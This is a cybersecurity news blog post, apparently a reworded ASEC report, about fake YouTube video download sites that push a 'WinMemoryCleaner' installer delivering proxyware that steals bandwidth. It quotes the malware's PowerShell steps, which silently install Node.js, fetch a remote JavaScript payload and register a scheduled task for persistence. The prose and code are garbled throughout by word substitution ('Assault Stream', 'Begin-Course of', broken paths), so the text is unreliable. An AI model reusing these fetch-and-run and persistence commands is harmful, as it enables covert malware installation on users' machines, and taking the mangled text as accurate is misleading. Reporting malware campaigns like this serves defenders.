Skip to content
  • Home
  • Cyber Map
  • About Us – Contact
  • Disclaimer
  • Terms and Rules
  • Privacy Policy
Cyber Web Spider Blog – News

Cyber Web Spider Blog – News

Globe Threat Map provides a real-time, interactive 3D visualization of global cyber threats. Monitor DDoS attacks, malware, and hacking attempts with geo-located arcs on a rotating globe. Stay informed with live logs and archive stats.

  • Home
  • Cyber Map
  • Cyber Security News
  • Security Week News
  • The Hacker News
  • How To?
  • Toggle search form
Proxyware Malware Mimic as YouTube Video Download Site Delivers Malicious Javascripts

Proxyware Malware Mimic as YouTube Video Download Site Delivers Malicious Javascripts

Posted on August 25, 2025August 25, 2025 By CWS

Cybersecurity researchers have noticed a surge in misleading websites masquerading as YouTube video obtain providers to ship Proxyware malware in current weeks.

Victims searching for to seize movies in MP4 format are redirected by means of advert pages that sporadically current a obtain hyperlink for a seemingly reliable utility known as “WinMemoryCleaner.”

Behind this innocuous facade, nonetheless, lies a multi-stage installer that in the end deploys Proxyware and covertly enslaves the system’s community bandwidth.

The preliminary obtain executable, Setup.exe, unpacks WinMemoryCleaner.exe into the Program Recordsdata listing earlier than triggering an replace script through WinMemoryCleanerUpdate.bat.

As soon as executed, WinMemoryCleaner.exe performs surroundings checks to evade digital machines or sandbox evaluation, then invokes a PowerShell payload that installs Node.js and fetches a malicious JavaScript element from a distant server.

Assault Stream (Supply – ASEC)

ASEC analysts recognized this system as a refined evolution of earlier Proxyware campaigns, noting the attacker’s reliance on GitHub for internet hosting middleman instruments.

Subsequent phases contain the registration of two scheduled duties—“Schedule Replace” and “WindowsDeviceUpdates”—that make sure the JavaScript runs periodically underneath Node.js.

This script communicates primary system info to a command-and-control server and awaits directives, which might embody fetching extra scripts or initiating the ultimate Proxyware set up.

Info Despatched to C&C Server (Supply – ASEC)

ASEC researchers famous that the actor has pivoted from distributing solely DigitalPulse and HoneyGain Proxyware to integrating Infatica’s agent, enhancing bandwidth theft capabilities.

The influence of this marketing campaign is twofold: affected programs expertise degraded community efficiency, and the attacker monetizes the stolen bandwidth by means of affiliate packages.

YouTube Downloader Web page and Malware Obtain Hyperlink (Supply – ASEC)

Proxyware packages sometimes share idle community throughput, promising remuneration to finish customers, however com promise victims unwittingly provide bandwidth with out compensation.

In areas with excessive adoption of streaming providers, resembling South Korea, the marketing campaign’s attain has grown considerably, prompting warnings from main AV distributors.

An infection Mechanism

A deeper examination of the an infection mechanism reveals the pivotal function of the PowerShell script delivered by WinMemoryCleaner.exe.

The script begins with a stealthy set up of Node.js:-

Invoke-WebRequest -Uri ” -OutFile “$env:TEMPnode.msi”
Begin-Course of msiexec.exe -ArgumentList ‘/i’,$env:TEMP + ‘node.msi’,’/qn’ -Wait

As soon as Node.js is in place, the script downloads pas.js from a cloudfront URL and registers it:-

$jsUrl = ”
Invoke-WebRequest -Uri $jsUrl -OutFile “$env:ProgramFilesWinMemoryCleanerp.js”
schtasks /Create /F /SC MINUTE /MO 30 /TN “Schedule Replace” /TR “node $env:ProgramFilesWinMemoryCleanerp.js”

Steady execution of the JavaScript element underneath Node.js allows dynamic updates and last payload deployment, making eradication difficult with out specialised instruments.

Enhance your SOC and assist your crew defend what you are promoting with free top-notch risk intelligence: Request TI Lookup Premium Trial.

Cyber Security News Tags:Delivers, Download, Javascripts, Malicious, Malware, Mimic, Proxyware, Site, Video, YouTube

Post navigation

Previous Post: Phishing Campaign Uses UpCrypter in Fake Voicemail Emails to Deliver RAT Payloads
Next Post: Hackers Sabotage Iranian Ships Using Maritime Communications Terminals in Its MySQL Database

Related Posts

4M+ Internet-Exposed Systems at Risk From Tunneling Protocol Vulnerabilities 4M+ Internet-Exposed Systems at Risk From Tunneling Protocol Vulnerabilities Cyber Security News
New Attack Technique Tricks AI Browsers Using a Simple ‘#’ New Attack Technique Tricks AI Browsers Using a Simple ‘#’ Cyber Security News
Beware of Malicious Steam Cleanup Tool Attack Windows Machines to Deploy Backdoor Malware Beware of Malicious Steam Cleanup Tool Attack Windows Machines to Deploy Backdoor Malware Cyber Security News
Google Releases Guide to Harden Security Strategy and Detection Capabilities Against UNC6040 Google Releases Guide to Harden Security Strategy and Detection Capabilities Against UNC6040 Cyber Security News
New Gmail Phishing Attack Uses AI Prompt Injection to Evade Detection New Gmail Phishing Attack Uses AI Prompt Injection to Evade Detection Cyber Security News
G_Wagon npm Package Attacking Users to Exfiltrates Browser Credentials using Obfuscated Payload G_Wagon npm Package Attacking Users to Exfiltrates Browser Credentials using Obfuscated Payload Cyber Security News

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News

Recent Posts

  • India to Prohibit Chinese CCTV Sales by 2026
  • FBI Verifies Email Breach as US Offers Reward for Hackers
  • Critical F5 BIG-IP Vulnerability Now Actively Exploited
  • China-Linked Cyber Threats Target Southeast Asian Government
  • AI-Powered VoidLink Malware Framework Poses New Cyber Threat

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Archives

  • March 2026
  • February 2026
  • January 2026
  • December 2025
  • November 2025
  • October 2025
  • September 2025
  • August 2025
  • July 2025
  • June 2025
  • May 2025

Recent Posts

  • India to Prohibit Chinese CCTV Sales by 2026
  • FBI Verifies Email Breach as US Offers Reward for Hackers
  • Critical F5 BIG-IP Vulnerability Now Actively Exploited
  • China-Linked Cyber Threats Target Southeast Asian Government
  • AI-Powered VoidLink Malware Framework Poses New Cyber Threat

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News

Copyright © 2026 Cyber Web Spider Blog – News.

Powered by PressBook Masonry Dark